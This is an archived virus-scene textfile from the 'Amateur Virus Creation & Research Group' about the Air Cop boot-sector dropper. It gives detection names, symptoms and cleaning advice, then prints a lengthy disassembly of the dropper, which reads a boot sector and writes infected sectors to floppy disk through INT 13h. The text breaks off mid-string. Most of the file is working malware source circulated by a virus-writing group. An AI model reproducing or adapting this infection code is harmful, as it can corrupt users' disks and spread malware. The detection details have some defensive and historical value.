💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.007 captured on 2023-06-16 at 21:01:06.
-=-=-=-=-=-=-
??????? ? ? ????????? ? ????????
? ? ? ? ? ??? ??
? ? ? ? ? ? ??
??????????? ? ? ? ?
? ? ? ? ? ?
? ? ? ? ? ?
? ? ?????? ????????? ?
??? ??? ???? ??????? ???? ???????? ? ? ? ???????
? ??? ? ? ? ? ? ? ?? ? ?? ? ?
? ? ? ? ? ???? ? ? ?? ? ? ? ? ?????
? ? ???????? ? ?? ???????? ?? ? ? ? ? ?
? ? ? ? ??????? ? ? ???????? ? ? ?? ???????
Distributed By Amateur Virus Creation & Research Group (AVCR)
?????????????????????????????????????????????????????????????????????????????
Research of the Air Cop Virus
by
Security Threat
Name of Virus: Air Cop
-----------------------------------------------------------------------------
Alias: Air Dropper
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information - Resident boot
-----------------------------------------------------------------------------
Antivirus Detection:
(1)
ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus
(2)
Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper
(3)
McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus
(4)
MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper
-----------------------------------------------------------------------------
Execution Results: It is a resident boot virus and it installs itself into
C:\ giving you an error saying "Non-system disk please replace and hit enter"
-----------------------------------------------------------------------------
Cleaning Recommendations: Cleaning is impossible but to rid your machine of
the virus a boot off of a boot disk is needed and if drive C: can be acessed
it must be reformatted.
-----------------------------------------------------------------------------
Researcher's Notes: Reads "STACK!" many times over and gives a warning line
then states that the virus is written by RABID development Corp.
-----------------------------------------------------------------------------
Disassembly of the AirCop Virus
-----------------------------------------------------------------------------
PAGE 59,132
;==========================================================================
;== ==
;== AIRCOP ==
;== ==
;== Created: 11-Jan-91 ==
;== Version: ==
;== Passes: 5 Analysis Options on: ABFMNOPU ==
;== ==
;== ==
;==========================================================================
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
keybd_q_head EQU 1AH ; (0040:001A=2CH)
keybd_q_tail EQU 1CH ; (0040:001C=2CH)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
AIRCOP PROC FAR
START:
MOV AX,CS
MOV DS,AX
MOV SP,3B6H
MOV AH,0
MOV AL,3
INT 10H ; Video display ah=functn 00h
; set display mode in al
MOV DX,52BH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,3C3H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,4E5H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,464H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,480H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,40H
MOV ES,AX
PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH)
POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH)
MOV AX,CS
MOV ES,AX
MOV AH,8
INT 21H ; DOS Services ah=function 08h
; get keybd char al, no echo
MOV CX,3
LOCLOOP_1:
PUSH CX
MOV AX,201H
MOV BX,5D0H
MOV CX,1
MOV DX,0
INT 13H ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
POP CX
JNC LOC_2 ; Jump if carry=0
LOOP LOCLOOP_1 ; Loop if cx > 0
MOV DX,4F2H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,4CFFH
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_2:
MOV CX,3
LOCLOOP_3:
PUSH CX
MOV AX,301H
MOV BX,5D0H
MOV CX,2709H
MOV DX,100H
INT 13H ; Disk dl=drive a ah=func 03h
; write sectors from mem es:bx
POP CX
JNC LOC_4 ; Jump if carry=0
LOOP LOCLOOP_3 ; Loop if cx > 0
MOV DX,50EH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,4CFFH
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_4:
MOV CX,3
LOCLOOP_5:
PUSH CX
MOV AX,301H
MOV BX,7D0H
MOV CX,1
MOV DX,0
INT 13H ; Disk dl=drive a ah=func 03h
; write sectors from mem es:bx
POP CX
;* JNC LOC_6 ;*Jump if carry=0
DB 73H, 0EH
LOOP LOCLOOP_5 ; Loop if cx > 0
MOV DX,57CH
MOV AH,9
DATA_1 DD 0FFB821CDH
DATA_2 DD 0BA21CD4CH
DB 0E5H, 04H,0B4H, 09H,0CDH, 21H
DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH
DB 21H,0B8H, 00H, 4CH,0CDH
DB 21H
DATA_3 DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 0DH, 0AH, 'Attention: This virus '
DB 'sample uses only in research tea'
DB 'ms.', 0DH, 0AH, ' Plea'
DB 'se do not use in joking or setti'
DB 'ng trap on someone.', 0DH, 0AH, 0DH
DB 0AH, 'Warning! This file installs'
DB ' "